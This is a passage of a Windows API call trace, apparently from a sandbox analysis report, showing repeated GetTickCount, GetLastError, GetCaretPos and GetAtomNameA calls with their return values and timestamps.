GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] GetTickCount () returned 0x1147188 [0048.744] GetLastError () returned 0x0 [0048.744] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.745] GetLastError () returned 0x0 [0048.745] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.746] GetTickCount () returned 0x1147188 [0048.746] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.747] GetTickCount () returned 0x1147188 [0048.747] GetLastError () returned 0x0 [0048.748] GetTickCount () returned 0x1147188 [0048.748] GetLastError () returned 0x0 [0048.748] GetTickCount () returned 0x1147188 [0048.748] GetLastError () returned 0x0 [0048.748] GetTickCount () returned 0x1147188 [0048.748] GetLastError () returned 0x0 [0048.748] GetTickCount () returned 0x1147188 [0048.748] GetLastError () returned 0x0 [0048.748] GetTickCount () returned 0x1147188 [0048.748] GetLastError () returned 0x0 [0048.748] GetTickCount () returned 0x1147188 [0048.748] GetLastError () returned 0x0 [0048.748] GetTickCount () returned 0x1147188 [0048.748] GetLastError () returned 0x0 [0048.748] GetTickCount () returned 0x1147188 [0048.748] GetLastError () returned 0x0 [0048.748] GetTickCount () returned 0x1147188 [0048.748] GetLastError () returned 0x0 [0048.748] GetTickCount () returned 0x1147188 [0048.748] GetLastError () returned 0x0 [0048.748] GetTickCount () returned 0x1147188 [0048.748] GetLastError () returned 0x0 [0048.748] GetTickCount () returned 0x1147188 [0048.748] GetLastError () returned 0x0 [0048.748] GetTickCount () returned 0x1147188 [0048.748] GetLastError () returned 0x0 [0048.884] lstrlenA (lpString="") returned 0 [0048.885] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.885] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.885] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.885] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.885] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.885] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.885] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.885] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.885] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.885] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.885] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.885] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.885] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.885] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.885] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.885] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.885] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.885] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.885] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.885] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.885] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.885] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.886] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.886] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.886] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.886] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.886] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.886] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.886] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.886] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.886] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.886] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.886] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.886] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.886] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.886] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.886] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.886] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.886] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.886] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.886] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.886] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.886] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.886] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.886] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.886] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.886] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.886] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.886] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.886] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.886] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.886] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.886] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.886] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.886] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.886] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.887] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.887] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.887] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.887] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.887] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.887] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.887] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.887] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.887] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.887] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.887] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.887] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.887] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.887] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.887] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.887] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.887] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.887] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.887] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.887] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.887] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.887] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.887] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.887] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.887] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.887] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.887] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.887] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.887] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.887] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.887] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.887] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.887] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.888] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.888] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.888] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.888] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.888] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.888] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.888] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.888] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.888] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.888] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.888] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.888] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.888] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.888] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.888] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.888] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.888] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.888] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.888] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.888] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.888] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.888] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.888] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.888] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.888] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.888] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.888] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.888] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.888] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.888] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.888] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.888] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.888] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.889] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.889] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.889] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.889] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.889] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.889] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.889] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.889] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.889] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.889] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.889] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.889] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.889] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.889] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.889] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.889] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.889] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.889] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.889] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.889] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.889] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.889] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.889] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.889] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.889] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.889] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.889] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.889] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.889] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.889] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.889] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.889] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.890] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.890] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.890] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.890] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.890] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.890] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.890] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.890] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.890] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.890] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.890] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.890] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.890] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.890] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.890] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.890] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.890] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.890] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.890] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.890] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.890] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.890] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.890] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.890] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.890] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.890] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.890] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.890] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.890] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.890] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.890] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.890] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.890] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.890] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.891] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.891] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.891] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.891] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.891] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.891] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.891] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.891] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.891] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.891] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.891] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.891] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.891] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.891] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.891] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.891] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: 